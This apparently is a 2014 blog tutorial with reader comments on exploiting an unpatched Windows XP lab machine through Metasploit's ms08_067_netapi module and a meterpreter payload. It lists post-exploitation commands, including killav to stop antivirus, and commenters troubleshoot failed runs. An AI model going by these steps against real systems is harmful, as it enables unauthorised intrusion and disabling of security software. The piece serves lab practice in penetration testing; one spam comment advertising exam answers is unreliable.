Friday, February 28, 2014

Penetration Testing : Hacking Windows Using Metaploit and Meterpreter

Pentesting with Windows Using Metasploit

Now, in the previous tutorial, which was the first tutorial on practical penetration testing, we got our hacking lab setup and exploited our first victim machine, which was an unpatched and vulnerable Windows XP machine. Our attacker machine was Kali Linux, and we were using Metasploit Framework, the most best tool when it comes to penetration testing (pentesting). We used the MS08-dcom vulnerability, which is a very famous vulnerability in Windows XP. The fact that it is famous means that most of the Windows machines already have this vulnerability patched, which means it will not actually work on a real life system (unless its your grandpa's system, which does not have automatic updates enabled). Now in this tutorial we will move on to payload execution, and see what all we can do after we have successfully exploited a vulnerability. It's important that you go through the previous tutorial in order to understand this one, as I will not explain the steps on how to exploit a system.



I will only show you what to do after you have successfully exploited one. Here is the link-

Exploiting A Vulnerable Windows Machine Using Metasploit

The above link will also help you setup a penetration testing lab with an attacker machine (Kali linux), a victim machine (XP unpatched). Both will be virtual machines and will be created using VMware workstation.  Now assuming you have read the above tutorial and have successfully exploited an XP machine, you are ready to move from the tedious jobs to the fun ones.

For those who come from previous tutorial

You are most probably left with something like
C:\WINDOWS\system32>
Now this is exactly what you'll get if you start a command prompt shell in your XP. A command prompt shell is like the terminal in linux. From here you  can do stuff in non GUI mode. The command prompt can be started on a Windows machine ( will work on any version most probably). Type <Windows> + R. The windows key can be found between ctrl and alt, and looks like the windows logo. This will open the Run window.( If the key combination doesn't seem to work, figure out some other way to get the run windows. Alternatively you can open the task manager and click new task.) Now type cmd and press enter. You will see a black windows with title command prompt. This is exactly what you obtained in your Kali machine after you successfully completed previous tutorial. Now what you can do is move around, create and delete stuff etc. For example 'cd..' (no quotes) takes you one directly above where you already where. cd <name> takes you to the name folder in command prompt (if it exists). Now I can't really start teaching command prompt here, and it will be better if you google it up or go to this site about command prompt codes. After you have played enough, type exit and you'll leave the command prompt. You can now move on to a better payload than the shell_bind_tcp that we were using. We will use the meterpreter payload.

Steps you don't repeat

  • Information gathering - You don't have to determine the IP addresses of target and victim computer again. They are the same.
  • You don't have to specify the exploit again, however you can use a new exploit if you want to. I recommend that you use a new exploit as you have to take every opportunity to practice more and more stuff, specially when you just got started. We used exploit/windows/dcerpc/ms03_026_dcom. This time we will use netapi , i.e. exploit/windows/smb/ms08_067_netapi

Things that changed

  • The PAYLOAD - We are using meterpreter payload instead of shell_bind_tcp. We will end up with something like meterpreter> instead of C:\WINDOWS\system32>. Once successful, meterpreter provides a lot of functionality.
  • The payload requirements. All payloads require you to specify the port and IP of target (RHOST). However, some payloads require the IP of attacker machine too (LHOST). Use SHOW OPTIONS to figure out what all data your exploit needs. In the information gathering step you already obtained the IP and open ports of victim as well as your own IP. Use the SET command to assign whatever values you need to assign. All other SET commands will be same, other than 
SET LHOST 192.168.---.---
The screenshots below will help you through the process. I will make it even more detailed when I am able to get time.

Exploiting the machine

Here are a few screenshots to guide you through the process of exploiting the machine. I am not explaining anything, as you already know the details from the previous tutorial. The point I want you to notice is that I'm using a different payload and a different exploit this time. The payload is meterpreter (the best payload offered by metasploit, with a load of functionality) and the exploit is Netapi (works on the same MS08 vulnerability, just a different exploit). The exploit has been changed just for the sake of practice, and you are suggested to try out even more exploits (most of the times you'll fail, but keep trying). Here are the screens-
Victim's IP (Windows XP)
Victim's IP (Windows XP)
Attacker's IP (Kali Linux)
Attacker's IP (Kali Linux)


Starting the postgresql and metasploit services
Starting the postgresql and metasploit services
Starting the metasploit framework
Starting the metasploit framework


Selecting the exploit
Selecting the exploit
Setting RHOST and PAYLOAD
Setting RHOST and PAYLOAD
Exploiting the XP target
Exploiting the XP target
So we finally have exploited the machine. Now the fun part begins

Post-exploitation fun : Using the payload features

To see a list of options provided by meterpreter, just type ?
meterpreter > ?

Getting to know the victim

Now lets do a basic sysinfo to see some info about the system we have just gained access to. Also, do a getuid to get information about the user that you are logged in as in the victim system, and the privilege the user (or you) have. And getpid will show you the process your payload is using, and ps lists all the processes running on the victim system.
meterpreter > sysinfo
meterpreter > getpid
meterpreter > getuid
meterpreter > ps
 Note: Making these code boxes is getting tedious some I'm gonna keep the code in bold. You guys help yourselves. (I'm lazy as hell)

A few random meterpreter run commands

You might also do a run checkvm to check if your target is running on a virtual machine.
To get a list of all applications installed on your victim machine, type run get_application_list.
To stop the antivirus on the victim, do a run killav. It will not work in practical cases, as killing an antivirus process can't possibly as easy as a single line of code. However, depending on your victim machine which you have chosen in this practice session, there are chances that it might work.

Conclusion

You just gotta try more commands. Most are fun.
That's it I guess. I'd leave you here. Explore other commands that you can execute, and comment if you find anything interesting. I'd keep adding stuff to this list whenever I get time.

55 comments:

  1. When I enter "exploit(ms08_076_netapi)>exploit" I get failed to validate LHOST. Any idea why?

    ReplyDelete
    Replies
    1. Basics - RHOST - IP of target computer. LHOST - IP of attacking machine (Kali Linux here). Many exploits don't require you to enter the LHOST, but if you get this error, that means you entered it wrong, or didn't enter it at all. Just execute ifconfig on a new kali terminal/console and look at the IP. Most probably it would be something like 192.168.---.---. Now in the exploit(ms08_076_netapi)>exploit terminal enter SET LHOST 192.168.---.---. That will do the trick I think.

      Delete
    2. I reopened console so I figure out how to exploit payload but I am getting same issue. When trying 'exploit terminal enter SET LHOST 192.168.---.---. It says
      Exploit failed [no-target] : No matching target. I am still trying things out to see if I can get around this issue but if you could lend a hand as to where exactly the problem exists it would be much appreciated. Thank you again!

      Delete
    3. It might be helpful to our viewers if you would share what went wrong and how you fixed it.

      Delete
    4. OK The problem is LHOST = Attacker Machine IP ( or basicaly your ip ).
      to get LHOST open another Terminal and type ifconfig.
      see wlan0 ip adress and type the in msfconsole set LHOST yourip

      Delete
  2. Once I successfully exploit my command line now starts with "C:\WINDOWS\system32>" I am having difficulty getting the meterpreter in use. Everything so far has been exceptionally explained. Please explain what I must do from where I am now to get meterpreter up and running. Thank You!

    ReplyDelete
  3. Excellent guide, keep them coming.

    ReplyDelete
  4. hey m getting an error
    Error generating payload : the payload failed to validate : LHOST

    ReplyDelete
    Replies
    1. set LHOST 192.168.xxx.xxx
      To find the actual IP (without the xxx), open a new terminal and type ifconfig. Look for IPv4 address.

      Delete
  5. i did this but still getting the same error

    ReplyDelete
  6. I Didnt reached to show options my problem is m unable to create a payload on the first step

    ReplyDelete
  7. should i find an opent port for dis ip

    ReplyDelete
  8. Before starting msfconsole execute the following
    Service postgresql start
    Service metasploit start
    Also try to ping your target

    ReplyDelete
  9. prob man when i type exploit it say that expolit failed

    ReplyDelete
    Replies
    1. Copy and paste full error, as well as the result of show options.

      Delete
  10. hey guys i have installed kali linux in my virtual box now i want to connect to my wifi but m unable to see any wifi in kali linux i tried every way
    after executing the command "iwconfig" its saying that no wireless extension found

    ReplyDelete
    Replies
    1. Have you got an external wireless card. Internal ones aren't supported by virtual machines.

      Delete
  11. Exploit aborted due to failure : no-target: No matching target

    What now??

    ReplyDelete
    Replies
    1. Chances are it's a newer machine. Vista or newer. Have you tried the firefox exploit. just need to get remote host to install api for firefox.

      Delete
  12. After I execute the console shows me the following: Attempting to trigger the vulnerability... And then it throws me back to the netapi context. Any Idea?

    ReplyDelete
    Replies
    1. now i get the status pipe not available

      Delete
  13. Also have a problem with Attempting to trigger the vulnerability and then it throws me back to the netapi.
    Im using kali on vm on windows 8 connected to wireless ruter trying to acces win xp3 connected with cable to router.

    ReplyDelete
  14. thanks bhaiya let me introduce me my Name is pranjal mishra and am in class 8 am more than a beginner to java language.

    ReplyDelete
  15. please help me......exploit failed no target no matching target......... please helppppppppppppppppppp

    ReplyDelete
    Replies
    1. Hi! i have the same problem! Did you mange to find a solution!

      Delete
    2. Same problem..does anyone have a solution to this problem?

      Delete
    3. the problem is your ip is not configured.
      to do this open new terminal and type ifconfig
      you will see your IPv4 copy it

      Now open again msfconsole and type 'set LHOST yourip' ( without quotetation marks )
      and try to exploit it again

      Delete
    4. Still it doesn't work

      exploit worked in case when i made .exe file

      but not working using RHOST method showing error as:

      msf exploit(ms08_067_netapi) > exploit

      [*] Started reverse TCP handler on my_ip:my_port
      [*] victim_ip:445 - Automatically detecting the target...
      [*] victim_ip:445 - Fingerprint: Windows 8.1 - - lang:Unknown
      [*] victim_ip - We could not detect the language pack, defaulting to English
      [-] victim_ip:445 - Exploit aborted due to failure: no-target: No matching target
      [*] Exploit completed, but no session was created.


      what should i do?

      Delete
  16. in kali linux.....Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

    ReplyDelete
  17. hey I did everything and reached the final stage. But it gets stuck at (sending exploit....) and after sometime it returns back to [msf exploit(ms03_026_dcom) >].... please help...

    ReplyDelete
  18. Exploit aborted due to failure: no-target: No matching target

    ReplyDelete
  19. Exploit aborted due to failure: no-target: No matching target.............reasons or this error?

    ReplyDelete
  20. i want ask you if this exploit working using windows 8.1

    ReplyDelete
  21. Exploit aborted due to failure: no-target: No matching target

    What means that ?

    ReplyDelete
  22. [-] Exploit aborted due to failure: no-target: No matching target
    Error appears even though local IP and rhost IP are correct
    Please help..

    ReplyDelete
  23. Exploit aborted due to failure: no-target: No matching target
    plz help

    ReplyDelete
  24. I am experiencing same problem and bot ip are good

    ReplyDelete
    Replies
    1. Try to show options and see what is required, some times you need to set the local host LHOST,local port LPORT, beside the RHOST AND THE PAYLOAD and perform the command exploit.

      Delete
  25. please !! no found! [-] Exploit failed: The following options failed to validate: LHOST.

    ReplyDelete
  26. Hey I found a list of some pretty cool meterpreter commands that anyone who's not really familiar with it can use https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

    ReplyDelete
  27. exploit(ms03_026_dcom) > exploit

    [*] Started bind handler
    [*] 192.168.179.129:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] 192.168.179.129:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.179.129[135] ...
    [*] 192.168.179.129:135 - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.179.129[135] ...
    [*] 192.168.179.129:135 - Sending exploit ...
    [*] Exploit completed, but no session was created.
    msf exploit(ms03_026_dcom) > cd ..
    msf exploit(ms03_026_dcom) > cd C:\WINDOWS
    [-] The specified path does not exist
    msf exploit(ms03_026_dcom) >

    C:\WINDOWS\system32> is not showing.
    WHAT TO DO?

    ReplyDelete
  28. hello
    i am type service metasploit start
    Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory.

    ReplyDelete
  29. utomatically detecting the target...
    [*] Fingerprint: Windows 8 - - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target

    ReplyDelete
  30. This web page incorporate unfastened WAEC expo 2022 questions and answers. We have the fine WAEC expo runz available on this web page. College students who wish to attain all A’s on this yr’s WAEC are anticipated to get 2022 WAEC expo questions and answers. Read the full info here https://legitexpo.com.ng/2022-waec-mathematics-answers.

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC